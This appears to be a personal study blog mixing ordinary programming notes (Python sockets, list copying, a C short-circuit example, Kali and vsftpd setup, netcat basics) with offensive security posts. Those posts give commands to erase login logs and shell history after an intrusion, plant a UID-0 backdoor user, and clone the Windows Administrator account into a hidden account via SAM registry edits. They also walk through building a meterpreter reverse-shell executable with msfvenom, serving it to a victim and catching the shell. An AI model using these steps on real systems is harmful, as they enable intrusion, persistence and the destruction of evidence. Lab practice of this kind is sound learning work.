Socket

Server

import socket

HOST = ‘localhost’
PORT = 1337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)

conn, addr = s.accept()
print ‘Connected by’, addr

while 1:
data = conn.recv(1024)
if not data:break
print(data)
conn.send(data)

conn.close()

Client

import socket

HOST = ‘localhost’
PORT = 1337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

string1 = raw_input(‘pls enter something:’)
s.send(string1)
data = s.recv(1024)

s.close()
print ‘Received’, repr(data)

Enable ssh on OS X

The Apple Mac OS X operating system has SSH installed by default
but the SSH daemon is not enabled. This means you can’t login
remotely or do remote copies until you enable it.

To enable it, go to ‘System Preferences’. Under ‘Internet & Networking’
there is a ‘Sharing’ icon. Run that. In the list that appears, check the
‘Remote Login’ option.

This starts the SSH daemon immediately and you can remotely login using
your username. The ‘Sharing’ window shows at the bottom the name and IP
address to use. You can also find this out using ‘whoami’ and ‘ifconfig’
from the Terminal application.

so you can scp file like this on Kali Linux
scp Socket* like@192.168.1.110:~

List in Python

List

list中指定位置增加元素

name.insert(1, “hello”) 表示在name的第1元素后加入 (从第0开始计算)
append表示在最后追加

name.remove(“hello”) 删除hello

pop方法 弹出
List.pop(0) 弹出第0号元素

关于copy操作一个很有意思的现象

name = [‘alex’,’jack’,[1,2,3,34]]
name1 = name.copy()
name1[0] = ‘ALEX’
name1[2][1] = 11111

print(name)
print(name1)

其中输出结果为
like$python3 copytest.py
[‘alex’, ‘jack’, [1, 11111, 3, 34]]
[‘ALEX’, ‘jack’, [1, 11111, 3, 34]]
like$

我们看到其中list中嵌套的list值都改变了,是因为里面的list为共享数据!

我们创建name的时候,python在内存里面的一个地址存入了name,并且name里的list也是会被分配一个地址
但是我们在进行copy操作的时候,我们原封不动的取了name的元素作为新的list,但是原来name里面的list地址还是指向原先的
内部list地址,所以后面我们在对name的内部list进行更改的时候,同样name1中的内部list也会受到影响!

我们利用python中的id方法来验证这点!
like$python3
Python 3.5.1 (v3.5.1:37a07cee5969, Dec 5 2015, 21:12:44)
[GCC 4.2.1 (Apple Inc. build 5666) (dot 3)] on darwin
Type “help”, “copyright”, “credits” or “license” for more information.

list1 = [1,2,[1,2,3]]
list2 = list1.copy()

id(list1)
4313896776
id(list2)
4313896456
id(list1[2])
4313896520
id(list2[2])
4313896520

深COPY

name = [‘alex’,’jack’,[1,2,3,34]]
name1 = name.deepcopy()
name1[0] = ‘ALEX’
name1[2][1] = 11111

则完全copy一份数据

import copy
list3 = copy.deepcopy(list1)
id(list3)
4314698952
id(list3[2])
4314754312

Sort()方法在Python2和Python3中的不同

Python3中不允许数字和字符串进行sort
Python2中是可以的,具体排序是按照对应的ASCII码进行排序,数字在前,字母在后

index()返回下标
count()返回数量
extend()拓展
append()追加

入侵删除记录 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
删除成功登录记录:
echo > /var/log/wtmp
last

删除失败登录记录:
echo > /var/log/btmp
lastb

删除操作记录
clear history
history -c

留用户
useradd -d /usr/sam -m sam
passwd sam 加入密码

将sam拥有和root一样的权限
打开/etc/passwd 将500500500改成0 保存退出

Windows克隆Administrator账户实验

Windows克隆Administrator账户

1
2
前提这只是一个小型实验,目的在于克隆Windows的超级管理员。
主要利用原理是利用SID (Security Identifier)获取权限

实验流程

1
2
3
4
5
6
1.CMD 添加账户
“net user linet$ 123 /add”

2.CMD 打开regedt32
对HKEY_LOCAL_MACHINE\SAM中adminstrator权限设置成full control
见下图

1
2
3
4
5
3.CMD 打开regedit
查看Adminstrator和linet$用户对应的reg值,然后导出来
我这边将其三个文件导出来分别为 linet.reg 000003EB.reg 000001F4.reg
其中000003EB.reg对应linet$用户,000001F4.reg对应Adminstrator
详细如下图

1
4.用notepad打开000003EB.reg 000001F4.reg,将000001F4.reg中下图红色框内容覆盖000003EB.reg对应位置


1
2
3
4
5
6
7
8
9
10
11
5.CMD 删除linet$账户
“net user linet$ /del”

6.分别执行linet.reg 000003EB.reg注册表
次序别错,虽然我不知道错了会有什么影响,总之没试过,ZZ

7.CMD下给linet$加上密码
"net user linet$ 123"

8.远程登录测试
如下图


总结

1
2
3
4
5
6
7
8
9
这个Test其实最关键的原理其实是抓住了SID,Windows按照SID来区别
用户的,不是按照用户的账户名称,我们利用这点复制了Adminstrator
的权限,所以我们用linet$账户进行远程登录的时候会看到和Adminstrator
登录时候一样的桌面。因为权限是一样的,还有其实一般黑客喜欢用Guest克隆账户,为什么呢?
这是因为在GUI中看不到多余的账户,一般谨慎一点的操作系统管理会比较
注意有没有多余账户,net user这样方式创建账户时候即使加了$符号
在cmd中看不到但是在GUI中还是可以看到的!所以这也是为什么黑客喜欢
使用Guest账户克隆的原因,这也就解释了为什么在等保测试中需要对
Adminstrator账户,Guest账户进行改名!(注意这两个账户是无法删除的)

撒有哪啦,不扯犊子了 ,继续看视频去了 ZZ…

Hack Windows 10-8-8.1-7 With Metasploit

How to hack windows 10-8-8.1-7 with Metasploit

Steps

Generate an executable file

1
2
3
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.130.132 LPORT=4444 -f exe > /root/Desktop/
WindowsPath.exe

The “LHOST” is our local machine!
The WindowsPath.exe is the executable file which we
will use later on target machine

Using multi handler

1
2
3
4
5
6
7
8
9
10
1.open the msfconsole
Just run the command "msfconsole"
2.use multi handler
Just run the command "use multi/handler"
3.set Payload
Just run the command "set PAYLOAD windows/meterpreter/reverse_tcp"
4.Set LHOST and LPORT on Kali Linux
Just run the following command
"set LHOST 192.168.130.132"
"set LPORT 4444"

Start the apache2 service in Debian

1
2
3
4
1. We open the apache2 service
Just run command "service apache2 start"
2. Open the browser and enter "localhost" to see
if the apache server was working!

Well my server works quit Well. Let’s continue

Put the executable file in our server

1
2
3
"cp /root/Desktop/WindowsPath.exe /var/www/mybase/"
Notice: I change the location of DocumentRoot.
If you don't know how to change the location, pls google, ZZ

Exploit

1
2
3
Just run "exploit"
When the victim open the WindowsPath.exe file, our
work was done.

Test

1
2
Run "sysinfo" to see the version of Windows
Run “shell” to open the shell of Windows

Here is my Test,i finish it on my virtual machines.

Reference

Binary-Payloads

MS08-067

Brief

1
2
3
4
5
6
7
MS08-067 pathed an issue in the netapi32.dll that could allow
attackers to use a specially crafted remote procedure call request
via the Server Message Block(SMB) service to take over a target system.
This vulnerability is particularly dangerous because it does not require
an attacker to authenticate to the target machine before running the
attack. MS08-067 gained eternal infamy as the vulnerability exploited
by the Conficker worm, which was widely reported in the media.

Risk on different platform

References

Netapi32.dll and MS08-067

Rapid7

Results from Metasploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
msf > info exploit/windows/smb/ms08_067_netapi

  Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
   Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
   Privileged: Yes
   License: Metasploit Framework License (BSD)
   Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm <x@hdm.io>
  Brett Moore <brett.moore@insomniasec.com>
  frank2 <frank2@dc949.org>
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese - Brazilian (NX)
  68  Windows 2003 SP2 Spanish (NO NX)
  69  Windows 2003 SP2 Spanish (NX)
  70  Windows 2003 SP2 Japanese (NO NX)
  71  Windows 2003 SP2 French (NO NX)
  72  Windows 2003 SP2 French (NX)

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST                     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 410
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing NX on some operating systems and service packs.
  The correct target must be used to prevent the Server Service (along
  with a dozen others in the same process) from crashing. Windows XP
  targets seem to handle multiple successful exploitation events, but
  2003 targets will often crash or hang on subsequent attempts. This
  is just the first version of this module, full support for NX bypass
  on 2003, along with other platforms, is still in development.

References:
  http://cvedetails.com/cve/2008-4250/
  http://www.osvdb.org/49243
  http://technet.microsoft.com/en-us/security/bulletin/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Netcat

Brief

The Swiss Army Knife of TCP/IP Connections

As the man page notes, the Netcat tool is known as the Swiss Army knife
for TCP/IP connections. It’s a versatile tool.

Usage

1
root@kali:~#nc -h

Check to see if a port is listening

1
2
3
4
root@kali:~#nc -v [target ip address] [port]

example:
nc -v 192.168.130.133 80

You can also use the following command:

1
2
root@kali:~#nc -lvp 1234
listening on [any] 1234....

You use the options l for listen, v for verbose,and p to spcify the port to listen on

Kali Linux source file and install vsftpd

Change the source of Kali Linux

1
2
3
4
5
6
7
8
cat &lt;&lt; EOF &gt; /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF

apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot

Install vsftpd in Kali Linux

1
apt-get install vsftpd

If you want to allow local users to log in and to allow ftp uploads you have to edit file /etc/vsftpd.conf uncommenting the following

1
2
3
4
5
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
anonymous_enable=NO

start the service

1
2
3
4
service vsftpd start

check:
netstat -nat | grep 21

References

Source
Install-vsftpd

C语言短路现象

C语言短路现象


#import 

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        // insert code here...
        int a = 10, b = 20, c = 30;
        BOOL d = a > b && b++;
        BOOL e = a < b && c++;
        printf("%d\n", b);
        printf("%d\n", c);

    }
    return 0;
}


1
2
3
上面的结果:
b为20
c为31
1
2
3
4
5
6
7
8
9
当在语句BOOL d = a > b && b ++;
因为a = 10, b = 20 所以自然不成立,而后面是&& 操作符 故
不会执行后面的b++

当在语句BOOL e = a < b && c++;
因为a = 10, b = 20 成立,这个时候&&后面的内容就必须得进行操作
所以c++ 完成自增,so c = 31

同理其中&&替换成其他运算符按照相同原理判断

附一张出差唐山的图片,嘻嘻

,